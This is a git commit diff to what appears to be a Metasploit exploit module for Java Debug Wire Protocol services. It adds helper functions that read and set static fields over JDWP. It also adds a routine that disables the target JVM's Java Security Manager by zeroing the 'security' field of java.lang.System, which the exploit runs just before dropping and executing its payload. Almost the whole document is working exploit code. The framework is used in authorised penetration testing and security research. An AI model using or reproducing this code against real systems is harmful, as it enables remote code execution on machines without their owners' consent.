Add feature for disabling Java Security Manager

julianvilas · julianvilas · commit caa1e10370da · 2014-06-15T20:35:19.000+02:00
diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
   METHODS_SIG               = [2, 5]
   GETVALUES_SIG             = [2, 6]
   CLASSOBJECT_SIG           = [2, 11]
+  SETSTATICVALUES_SIG       = [3, 2]
   INVOKESTATICMETHOD_SIG    = [3, 3]
   CREATENEWINSTANCE_SIG     = [3, 4]
   REFERENCETYPE_SIG         = [9, 1]
@@ -389,6 +390,62 @@ def get_methods(reftype_id)
     @methods[reftype_id] = parse_entries(response, formats)
   end
 
+  # Returns information for each field in a reference type (ie. object)
+  def get_fields(reftype_id)
+    formats = [
+            [@vars["fieldid_size"], "field_id"],
+            ["S", "name"],
+            ["S", "signature"],
+            ["I", "mod_bits"]
+    ]
+    ref_id = format(@vars["referencetypeid_size"],reftype_id)
+    sock.put(create_packet(FIELDS_SIG, ref_id))
+    response = read_reply
+    fields = parse_entries(response, formats)
+
+    fields
+  end
+
+  # Returns the value of one static field of the reference type. The field must be member of the reference type
+  # or one of its superclasses, superinterfaces, or implemented interfaces. Access control is not enforced;
+  # for example, the values of private fields can be obtained.
+  def get_value(reftype_id, field_id)
+    data = format(@vars["referencetypeid_size"],reftype_id)
+    data << [1].pack('N')
+    data << format(@vars["fieldid_size"],field_id)
+
+    sock.put(create_packet(GETVALUES_SIG, data))
+    response = read_reply
+    num_values = response.unpack('N')[0]
+
+    unless (num_values == 1) && (response[4].unpack('C')[0] == TAG_OBJECT)
+      fail_with(Failure::Unknown, "Bad response when getting value for field")
+    end
+
+    response.slice!(0..4)
+
+    len = @vars["objectid_size"]
+    value = unformat(len, response)
+
+    value
+  end
+
+  # Sets the value of one static field. Each field must be member of the class type or one of its superclasses,
+  # superinterfaces, or implemented interfaces. Access control is not enforced; for example, the values of
+  # private fields can be set. Final fields cannot be set.For primitive values, the value's type must match
+  # the field's type exactly. For object values, there must exist a widening reference conversion from the
+  # value's type to the field's type and the field's type must be loaded.
+  def set_value(reftype_id, field_id, value)
+    data = format(@vars["referencetypeid_size"],reftype_id)
+    data << [1].pack('N')
+    data << format(@vars["fieldid_size"],field_id)
+    data << format(@vars["objectid_size"],value)
+
+    sock.put(create_packet(SETSTATICVALUES_SIG, data))
+    read_reply
+  end
+
+
   # Checks if specified method is currently loaded by the target VM and returns it
   def get_method_by_name(classname, name, signature = nil)
     @methods[classname].each do |entry|
@@ -784,6 +841,34 @@ def set_step_event
     return r_id, t_id
   end
 
+  # Disables security manager if it's set on target JVM
+  def disable_sec_manager
+    sys_class = get_class_by_name("Ljava/lang/System;")
+
+    fields = get_fields(sys_class["reftype_id"])
+
+    sec_field = nil
+
+    fields.each do |field|
+      sec_field = field["field_id"] if field["name"].downcase == "security"
+    end
+
+    fail_with(Failure::Unknown, "Security attribute not found") if sec_field.nil?
+
+    value = get_value(sys_class["reftype_id"], sec_field)
+
+    if(value == 0)
+      print_good("#{peer} - Security manager was not set")
+    else
+      set_value(sys_class["reftype_id"], sec_field, 0)
+      if get_value(sys_class["reftype_id"], sec_field) == 0
+        print_good("#{peer} - Security manager has been disabled")
+      else
+        print_good("#{peer} - Security manager has not been disabled, trying anyway...")
+      end
+    end
+  end
+
   # Uploads & executes the payload on the target VM
   def exec_payload(thread_id)
     # 0. Fingerprinting OS
@@ -864,6 +949,9 @@ def exploit
     print_status("#{peer} - Deleting step event...")
     clear_event(EVENT_STEP, r_id)
 
+    print_status("#{peer} - Disabling security manager if set...")
+    disable_sec_manager
+
     print_status("#{peer} - Dropping and executing payload...")
     exec_payload(t_id)
 
